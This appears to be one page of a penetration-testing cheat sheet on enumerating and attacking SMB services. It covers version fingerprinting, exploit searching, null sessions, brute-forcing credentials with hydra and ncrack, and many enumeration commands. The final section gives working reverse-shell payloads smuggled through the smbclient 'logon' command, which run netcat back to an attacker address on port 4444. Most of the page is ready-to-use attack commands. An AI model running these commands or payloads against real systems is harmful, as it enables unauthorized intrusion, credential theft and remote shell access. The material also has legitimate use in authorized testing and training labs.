SMB Enumeration

What does SMB stands for ?

==> Server Message Block is a network protocol used to provide shared access to files, printers, and serial ports between nodes on a network.

==> SMB servers can be accessed through various command-line tools such as SMBClient or through file browsing tools. This service runs on either port 139 or port 445 by default.

SMB Versions ?

==> SMB1 was the first implementation of SMB. It used 16-bit packet and small data buffers, which greatly limited performance, it did not have any encryption for data in transit whatsoever, which is why it is so insecure. In addition to this, it is highly susceptible to MITM attacks.

==> SMB2 improved performance by increasing packets to 32-bit and 128-bit for files, furthermore unnecessary data that was transmitted when performing operating via SMB was substantially reduced. Security was improved to prevent MITM attacks through packet signing although still no built-in encryption support.

==> SMB3 added more performance and security enhancements such as multichannel and end-to-end encryption using AES were introduced in, as well as functionality to enforce secure connections with newer clients.

nmap -A -T4 -p 139,445 -oN nmap.log <IP>     // Runs the Aggressive scan, which includes version and script scan.

A basic step in enumerating SMB is to identify the version that the server is running on, as this will help in determining whether any publicly available exploit for that version can be abused to obtain remote code execution (RCE).

If suppose the above method fails, a connection can be started using Nmap or any tool which is capable for connecting to a SMB shares and we can capture the traffic via Wireshark, which will reveal the hostname of the machine, the SMB version, the operating system version, and other useful information.

Usage :
        search aux smb version                         // If suppose you don't remeber "auxiliary's" spelling xD
        set auxiliary/scanner/smb/smb_version         // Metasploit Module
        show options
        set options
        exploit !

The SMB version identifies by using the auxiliary/scanner/smb/smb_version Metasploit module.

Searching Publicly Available Exploits ?

searchsploit microsoft smb (smb version or windows)

If not found , the alternate plan is to search through the metasploit framework.

msf> search type:(exploit) platform:(windows) target:(Windows version)

==> Alternatively, if again nothing works don't hesitate to open sites which has related vulnerablity databases such as CVE, NVD and VULDB, Mostly they'll have vuln-related to patches documentation. Only ExploitDB contains the exploit code :)

Null Session Attack ?

smbclient -N -L //192.168.1.15//         // No password required (SMB null session).

A null session allows users to remotely connect with SMB by using an empty username and empty password.

This usually only allows access to the hidden share called IPC$ ( Inter-process communication).

Null sessions could be used to gather more information about the host and its network, or to access data stored in shares.

Nmap Scripts ?

smb-enum-shares     // Enumerates SMB shares in an SMB server.

smb-brute          // Performs brute-force password auditing against SMB servers.

smb-system-info   // Collects system information through SMB/NetBios.

smb-vuln-smb/cve*     // Identifies whether the SMB server is vulnerable to any known exploits.

It is good to run smb-enum* to collect all general information about the server and smb-vuln* to collect more information about any known exploits that might affect the server.

nmap --script=smb-enum*,smb-vuln* 10.10.10.102 -p 139,445 -Pn -n --disable-arp-ping

Common Credentials ?

A few common passwords or usernames such as admin, administrator, root, test, should be tried if null sessions are disabled on the remote SMB server.

This is safer than bruteforcing and this is something that should strike us when we pentest any network based service :)

smbclient -U user.txt -N \\\\10.10.10.124\\IPC$

An SMB authentication can also be performed using the auxilliary/scanner/smb/smb_login Metasploit module.

msfconsole -q
search aux scanner smb 
use auxilliary/scanner/smb/smb_login
show options
set options         // Which asks for "YES"
exploit

Bruteforcing Credentials

hydra [-L users.txt or -l user_name] [-P pass.txt or -p password] -f [-S port] ftp://<IP address>

=> A Bruteforce attack consists of an attacker resulting in a number of passwords or usernames so that we attack it with the correct combination, results us by giving access to the machine.

=> Network cracking tools such as hydra can be used to perform bruteforce attacks against online services such as FTP, HTTP, SMB etc.

=> In some cases, it can be a dictionary attack, that means hydra will use a list of usernames and passwords to perform the attack.

Packet Sniffing

Packet sniffing is the practice of collecting, and logging all the packets that pass through a computer network.

Because the data transmittion over older versions of SMB (version 1) on port 139,445 is unencrypted.

An attacker could intercept traffic on the network and grab all the credentials being used by the victim during an authentication.

In newer versions of SMB (version 2), traffic could be intercepted to capture the password hash but we'll still have to crack it using some cracking tools such as john, hashcat etc.

We can perform all this and test it using Wireshark ;)

While pentesting a box or an application, we get to see ports 139 and 445 is open. The first thing that should strike us is : 

nmap --script smb-protocols <IP>
--------------------------------------------------------------------------------------------------------------------------------
smbclient -L //<IP>//                 To indentify what all shares are present.
smbclient \\\\<IP>\\<share name>      Null Authentication login
smbclient --no-pass -L <IP>
-------------------------------------------------------------------------------------------------------------------------------
enum4linux -a <IP> | tee enum4linux.log        Enum4linux is a great tool to enumerate samba shares.
-------------------------------------------------------------------------------------------------------------------------------
smbmap -H <IP>
smbmap -H <IP> -u '' -p ''                SMBMap allows users to enumerate samba share drives across an entire domain.
smbmap -H <IP> -s <Share name>
-------------------------------------------------------------------------------------------------------------------------------
rpcclient -U "" <IP>            If successful then,
> enumdomusers
> enumdomgroups
> queryuser [rid]
> getdompwinfo
> getusrdompwinfo [rid]
------------------------------------------------------------------------------------------------------------------------------
crackmapexec smb <IP> -u '' -p '' --shares
crackmapexec smb <IP> -u 'sa' -p '' --shares
crackmapexec smb <IP> -u 'sa' -p 'sa' --shares
crackmapexec smb <IP> -u '' -p '' --share <Share name>
--------------------------------------------------------------------------------------------------------------------------------
ncrack -T 5 <IP> -p smb -v -u <Username> -P /usr/bin/wordlists/rockyou.txt
--------------------------------------------------------------------------------------------------------------------------------
mount -t cifs "//<IP>/share/" /mnt/wins
mount -t cifs "//<IP>/share/" /mnt/wins -o vers=1.0,user=root,uid=0,gid=0
---------------------------------------------------------------------------------------------------------------------------------
smbclient -U "username%password" //<IP>/share_name         After successful login,
smb> logon "/=nc'attack box IP' 4444 -e /bin/bash"         SMB shell to get a reverse shell.
smb> logon "/=`nohup nc -nv 10.10.14.6 4444 -e /bin/sh`"
---------------------------------------------------------------------------------------------------------------------------------

PreviousSSH EnumerationNextSMTP Enumeration

Last updated